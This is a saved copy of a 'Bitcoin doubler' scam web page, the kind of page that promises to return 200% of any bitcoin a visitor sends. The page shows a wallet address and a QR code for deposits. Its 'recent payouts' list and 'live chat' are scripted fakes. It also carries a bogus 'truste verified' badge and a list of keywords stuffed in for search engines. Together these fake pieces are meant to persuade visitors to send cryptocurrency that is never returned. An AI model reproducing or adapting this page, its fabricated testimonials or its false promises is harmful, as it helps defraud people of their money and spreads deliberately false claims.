
<!-- saved from url=(0014)about:internet -->
<html>
<!-- Mirrored from 2xbitgenerator.uno/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 20 Feb 2021 14:20:36 GMT -->
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript">

</script>

<title>BITCOIN DOUBLER </title>

<meta name="description" content="Bitcoin Generator - Earn Free Bitcoins in just a few moments without any investment! Use our Bitcoin Generator and you will receive free unlimited Bitcoin instantly!">
<meta name="keywords" content="Perfect Money Doubler,Perfec Money 2x,Perfect Money 200,Bitcoin Generator,Bitcoin Generator Online,Free Bitcoin Generator,Free,Bitcoin,BTC,Btc,Bitcoin Generator,btc,2018,generate,generated,Make Free Bitcoins,software,new,exploit,bitcoin, btc, xtb, bitcoin 2019, btc 2019, bitcoin generator, double bitcoin, free bitcoin, double bitcon free, free bitcoin generator, multiply bitcoin, multiply bitcoin free, double your Bitcoin in just 12 hours, double your bitcoin free, btc generator, double btc, free btc, double btc free, free btc generator, multiply bitcoin, multiply btc free, double your btc in just 12 hours, double your bitcoin free 2019, bitcoin generator 2019, double bitcoin 2019, free bitcoin 2019, double bitcon free 2019, free bitcoin generator 2019, multiply bitcoin 2019, multiply bitcoin free 2019, double your Bitcoin in just 12 hours 2019, double your bitcoin free 2019, btc generator2019 , double btc 2019, free btc 2019, double btc free 2019, free btc generator 2019, multiply bitcoin 2019, multiply btc free 2019, double your btc in just 12 hours 2019, double your bitcoin free 2019, bitcoin wallet, bitcoin address, buy bitcoin, ledger nano s, coinbase, coinmama, blockchain, generate bitcoin free, generate free bitcoin, invest bitcoin, bitcoin investment, generate bitcoin free 2019, generate free bitcoin 2019, invest bitcoin 2019, bitcoin investment 2019, doublebitcoinfree">


<link rel="icon" type="image/png" href="pack/img/btcimg.html">
<link rel="stylesheet" href="BITCOIN%20DOUBLER_files/rangeslider.css" type="text/css" media="screen">
<link rel="stylesheet" href="BITCOIN%20DOUBLER_files/main.css" type="text/css" media="screen">
<script src="BITCOIN%20DOUBLER_files/qrious.js.download"></script>



<style>
#panel, .flip {
  font-size: 16px;
  padding: 10px;
  text-align: center;
  background-color: none;
  color: white;
  border: solid 1px none;
  margin: auto;
}

#panel {
  display: none;
}


.floating-logo {
        position: fixed;
        left: 20px;
        bottom: 20px;
        opacity: .6;
    }
    .floating-logo img {
        width: 200px!important;
    }
    .floating-etrust {
        position: fixed;
        left: 20px;
        bottom: 20px;
        opacity: .6;
    }
    .floating-etrust img {
        width: 100px;
    }
}

</style>


<style>

input[type=text], select {
  width: 67%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
  border: 4px solid #093;
  font-family: "Lucida Console", Courier, monospace;
  font-weight: 900;
}



#bitbucket_loader_wrapper {
  animation: hover 2s ease-in-out infinite;
  font-variant: small-caps;
}

@keyframes hover {
  0% {
    transform: translateY(0px);
  }
  50% {
    transform: translateY(-6px);
  }
  100% {
    transform: translateY(0px);
  }
}

#bitbucket_loader {
  display: block;
  height: 10rem;
  animation: spin-wobble 4s ease infinite;
}

@keyframes spin-wobble {
  0% {
    transform: translateX(10px) translateY(-5px) rotateX(8deg) rotateZ(10deg);
  }
  20% {
    transform: translateX(-10px) translateY(-5px) rotateX(8deg) rotateZ(-10deg);
  }
  10%,
  30%,
  90% {
    transform: translateX(0px) translateY(0px) rotateX(0deg) rotateZ(0deg);
  }
  100% {
    transform: translateX(10px) translateY(-5px) rotateX(8deg) rotateZ(10deg);
  }
}

.head,
.mouth,
.eye-inner {
  fill: orange;
}

.eye-outter {
  fill: #FFFFFF;
}

.mouth {
  animation: mouth-drop 2s ease;
}

@keyframes mouth-drop {
  0%, 60% {
    transform: translateY(-60px);
  }
  70% {
    transform: translateY(0px);
  }
  80% {
    transform: translateY(-15px);
  }
  100% {
    transform: translateY(0px);
  }
}

.eye-translate g {
  animation: eye-rotate 4s ease infinite;
  transform-origin: center;
  transform: rotateY(70deg) translateZ(40px) translateX(80px) translateY(-8px) rotateX(-9.5deg);
}

@keyframes eye-rotate {
  0% {
    transform: rotateY(75deg) translateZ(40px) translateX(55px) translateY(-10px) rotateX(-9.5deg);
  }
  20% {
    transform: rotateY(-75deg) translateZ(40px) translateX(-55px) translateY(-10px) rotateX(-9.5deg);
  }
  10%,
  30%,
  90% {
    transform: rotateY(0deg) translateZ(40px) translateX(0px) translateY(0px) rotateX(0deg);
  }
  100% {
    transform: rotateY(75deg) translateZ(40px) translateX(55px) translateY(-10px) rotateX(-9.5deg);
  }
}


.loader {
  border: 8px solid #f3f3f3;
  border-radius: 50%;
  border-top: 8px solid blue;
  border-bottom: 8px solid blue;
  width: 30px;
  height: 30px;
  -webkit-animation: spin 2s linear infinite;
  animation: spin 2s linear infinite;
}

@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

.blink {
	-webkit-animation: blink .75s linear infinite;
	-moz-animation: blink .75s linear infinite;
	-ms-animation: blink .75s linear infinite;
	-o-animation: blink .75s linear infinite;
	 animation: blink .75s linear infinite;
}
@-webkit-keyframes blink {
	0% { opacity: 1; }
	50% { opacity: 1; }
	50.01% { opacity: 0; }
	100% { opacity: 0; }
}
@-moz-keyframes blink {
	0% { opacity: 1; }
	50% { opacity: 1; }
	50.01% { opacity: 0; }
	100% { opacity: 0; }
}
@-ms-keyframes blink {
	0% { opacity: 1; }
	50% { opacity: 1; }
	50.01% { opacity: 0; }
	100% { opacity: 0; }
}
@-o-keyframes blink {
	0% { opacity: 1; }
	50% { opacity: 1; }
	50.01% { opacity: 0; }
	100% { opacity: 0; }
}
@keyframes blink {
	0% { opacity: 1; }
	50% { opacity: 1; }
	50.01% { opacity: 0; }
	100% { opacity: 0; }
}
/* @end */
-->
</style>



</head>
<body>


<div class="aat"> 

 <div class="floating-etrust">
    <img src="BITCOIN%20DOUBLER_files/etrust.png" alt="truste verified" class="logo"> 
	 
	</div>
<a href="index.html" target="_blank">
<div align="center">
<div id="bitbucket_loader_wrapper">
 <svg version="1.1" id="bitbucket_loader" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="-479.2 140.2 122.4 160.6" style="enable-background:new -479.2 140.2 122.4 160.6;" xml:space="preserve">
 </svg><div class="pulse1"></div>
<div class="pulse2"></div>
<div class="icon"></div>
 
 <br><br><br><br>
  
  <img src="BITCOIN%20DOUBLER_files/logo.png"><br>
   

</div>
</div>
</a>

<header> 






  </header>
       
<div id="panel-exploit" class="aae">
<div class="aaj aai">AUTOMATIC WITHDRAWALS</div>

<div class="aaj">


<img src="pack/img/plan.png">
 <span id="aaj"></span>
 <span id="aaw"></span>
 


 <p>*Enter Your Bitcoin Wallet where you want to Receive Bitcoins &amp; Click On INVEST NOW To Invest.</p> 
 
 

 <input id="aas" class="aag" placeholder="Your BITCOIN Wallet Address Here.." pattern=".*(^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$).*" type="text" maxlength="40"><br><br>



<button class="pulse-button" onclick="myFunction()"><b>INVEST NOW</b></button><br><br>
 

  

<div id="panel">

  <span id="aam">Please send</span> BTC to <font color="orange"><strong>15Z3ggHXhje94gE2x6qwxaEDxL95c9244b</strong></font><p></p>
<canvas id="qr-code" height="200" width="200"></canvas><br><br>
   



<div align="center"><div class="tab blink"><strong>(Confirmation : 0/1)</strong></div></div>
<div class="center">
	   <div class="main-subtitle">
       <div class="main-subtitle__dot"><span></span><span></span><span>
	   </span><span></span><span></span></div>
       </div>
	     
</div>
	 *You will Receive your 200% BITCOINS After 1 confirmation.


</div>

<script>
function myFunction() {
  document.getElementById("panel").style.display = "block";
}
</script>
<script>
var qr;
             (function() {
                    qr = new QRious({
                    element: document.getElementById('qr-code'),
                    size: 200,
                    value: 'bitcoin:1AqCzawoDtLbWh5aZKQZ8BondyjcLVHsPK'
                });
            })();
</script>

</div>
</div>


<div class="aae"><div class="aaj aai">RECENT PAYOUTS</div>
<div id="aad" class="aaj"> 
<span id="aab" class="aab" data-seconds="0" data-time="1516831702"> 
  <span class="aap aal"> </span>&nbsp;Received
  <span class="aap aar">
<span class="aa4"></span> 
<span class="aa0">BTC</span>
</span> 


<span class="aap aas">
<span class="aax">&nbsp;</span>s ago</span> 
</span>



<table align="center">
 
  <tbody><tr><td id="btc1"></td><td id="rcvd1"></td><td id="amt1"></td></tr>
  <tr><td id="btc2"></td><td id="rcvd2"></td><td id="amt2"></td></tr>
  <tr><td id="btc3"></td><td id="rcvd3"></td><td id="amt3"></td></tr>
 


</tbody></table>

<span class="aab" data-seconds="0" data-time="1516831702" data-sec="7"> 
  <span class="aap aal">16ha9DjzSfoGBBwjjuqMoZQDeYsAic53..</span>&nbsp;Received
  <span class="aap aar">
<span class="aa4">0.016</span> 
<span class="aa0">BTC</span>
</span> 


<span class="aap aas">
<span class="aax">7</span>s ago</span> 
</span><span class="aab" data-seconds="0" data-time="1516831702" data-sec="2"> 
  <span class="aap aal">1HGmJJ3harkQLxcroyZsHEAGd4ZWp3ai..</span>&nbsp;Received
  <span class="aap aar">
<span class="aa4">0.004</span> 
<span class="aa0">BTC</span>
</span> 


<span class="aap aas">
<span class="aax">2</span>s ago</span> 
</span></div>
</div>




<div class="aae">
 <div class="aaj aai">LIVE CHAT</div><div class="aaj"><div id="aak"><div id="aag" class="aah">
 <span class="aao"></span> <span class="aam"></span></div><div class="aah">
 <span class="aao">[16:48] pologatin:</span> <span class="aam">a friend told me about this</span></div><div class="aah">
 <span class="aao">[16:48] Lelozinms:</span> <span class="aam">where i put in my Address?</span></div><div class="aah">
 <span class="aao">[16:48] jomafe:</span> <span class="aam">i am fine with having free btc how about you</span></div><div class="aah">
 <span class="aao">[16:48] lucasrl bb:</span> <span class="aam">why would someone just go here to hate and spam pff</span></div><div class="aah">
 <span class="aao">[16:48] Andreolco:</span> <span class="aam">I thought faucets is slowly dying, i hope this kind of doubler will get some interest in btc back</span></div><div class="aah">
 <span class="aao">[16:48] mintyamasuke:</span> <span class="aam">where do you come from?</span></div><div class="aah">
 <span class="aao">[16:48] jary06:</span> <span class="aam">i wish i found this earlier</span></div><div class="aah">
 <span class="aao">[16:48] Poder3:</span> <span class="aam">You should give it a try</span></div><div class="aah">
 <span class="aao">[16:48] Htopeludo:</span> <span class="aam">Works on bitgo?</span></div><div class="aah">
 <span class="aao">[16:49] comandoromulo:</span> <span class="aam">best btc website</span></div><div class="aah">
 <span class="aao">[16:49] pdptjr:</span> <span class="aam">Likely, but I think one day this will fail</span></div><div class="aah">
 <span class="aao">[16:49] Andreolco:</span> <span class="aam">brb</span></div><div class="aah">
 <span class="aao">[16:49] feguik:</span> <span class="aam">I sent 0.1 BTC from another address and wasnt problems</span></div><div class="aah">
 <span class="aao">[16:49] faxdeconta:</span> <span class="aam">so far I am cool with this</span></div><div class="aah">
 <span class="aao">[16:49] andsns:</span> <span class="aam">you will not receive any btc if you dont pay BTC</span></div><div class="aah">
 <span class="aao">[16:49] davidsm159:</span> <span class="aam">PM me pls</span></div><div class="aah">
 <span class="aao">[16:49] Kingsamurai:</span> <span class="aam">i thought my friend wanted to fool me with this website link. but you can rly get btc here if you dont mess up with the fee confirmations</span></div><div class="aah">
 <span class="aao">[16:50] leomgalindo:</span> <span class="aam">have doubled btc already. thanx God</span></div><div class="aah">
 <span class="aao">[16:50] zhane2:</span> <span class="aam">great doubler good i found this</span></div><div class="aah">
 <span class="aao">[16:50] TATA27:</span> <span class="aam">okay</span></div><div class="aah">
 <span class="aao">[16:50] MorbidGore:</span> <span class="aam">nice </span></div><div class="aah">
 <span class="aao">[16:50] burillos8547:</span> <span class="aam">I suggest to invest more and more BTC for Earn more and more BTC.. i am rich now.</span></div><div class="aah">
 <span class="aao">[16:50] nogava:</span> <span class="aam">so when will bitcoin arrive?</span></div><div class="aah">
 <span class="aao">[16:50] 44Forty:</span> <span class="aam">When I will receive my BTC?</span></div><div class="aah">
 <span class="aao">[16:50] drigornr:</span> <span class="aam">Nice</span></div><div class="aah">
 <span class="aao">[16:50] phaelphod:</span> <span class="aam">hi all who has some btc for me</span></div><div class="aah">
 <span class="aao">[16:50] Afonso8475:</span> <span class="aam">this website is used a lot sometimes you have to wait a bit</span></div><div class="aah">
 <span class="aao">[16:50] Jord4nn:</span> <span class="aam">@ Viper, you said that have already 4 BTC ?</span></div><div class="aah">
 <span class="aao">[16:51] iagoo123:</span> <span class="aam">i love BTC so much</span></div><div class="aah">
 <span class="aao">[16:51] iagoo123:</span> <span class="aam">incredible</span></div><div class="aah">
 <span class="aao">[16:51] rudinpsy:</span> <span class="aam">yo guys dont spam okay</span></div><div class="aah">
 <span class="aao">[16:51] jgspires:</span> <span class="aam">I received now btc. post here TX address?</span></div><div class="aah">
 <span class="aao">[16:51] michaeljs:</span> <span class="aam">maybe</span></div><div class="aah">
 <span class="aao">[16:51] andre486579:</span> <span class="aam">okay i applied thank you</span></div><div class="aah">
 <span class="aao">[16:51] iagoo123:</span> <span class="aam">thank you for messaging me man</span></div><div class="aah">
 <span class="aao">[16:51] golem 3:</span> <span class="aam">i can only recommend this stuff</span></div><div class="aah">
 <span class="aao">[16:51] Shin head:</span> <span class="aam">where do all of you come from</span></div><div class="aah">
 <span class="aao">[16:51] wyxzero:</span> <span class="aam">this still works at the moment</span></div><div class="aah">
 <span class="aao">[16:51] wyxzero:</span> <span class="aam">I know</span></div></div><form id="aae" onsubmit="return sendMessage();"> 
 <input type="text" id="aac" class="aag" placeholder="Username"> <input type="text" id="aaa" class="aag" placeholder="Message"> 
 <input type="submit" id="messager-send" class="aak" value="SEND"></form> <span id="aat" class="aaq"> Your message cannot be empty. </span>
 </div></div>




<footer> <a style="color:#fff; text-decoration: none;" href="index.html"> Copyright © 2xbitgenerator.uno</a>
</footer>
</div>
<script src="BITCOIN%20DOUBLER_files/exploit.js.download"></script>



<script src="BITCOIN%20DOUBLER_files/tcc_l.combined.1.0.6.min.js.download"></script>
<script src="BITCOIN%20DOUBLER_files/payout.js.download"></script>

</body>
<!-- Mirrored from 2xbitgenerator.uno/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 20 Feb 2021 14:20:53 GMT -->
</html>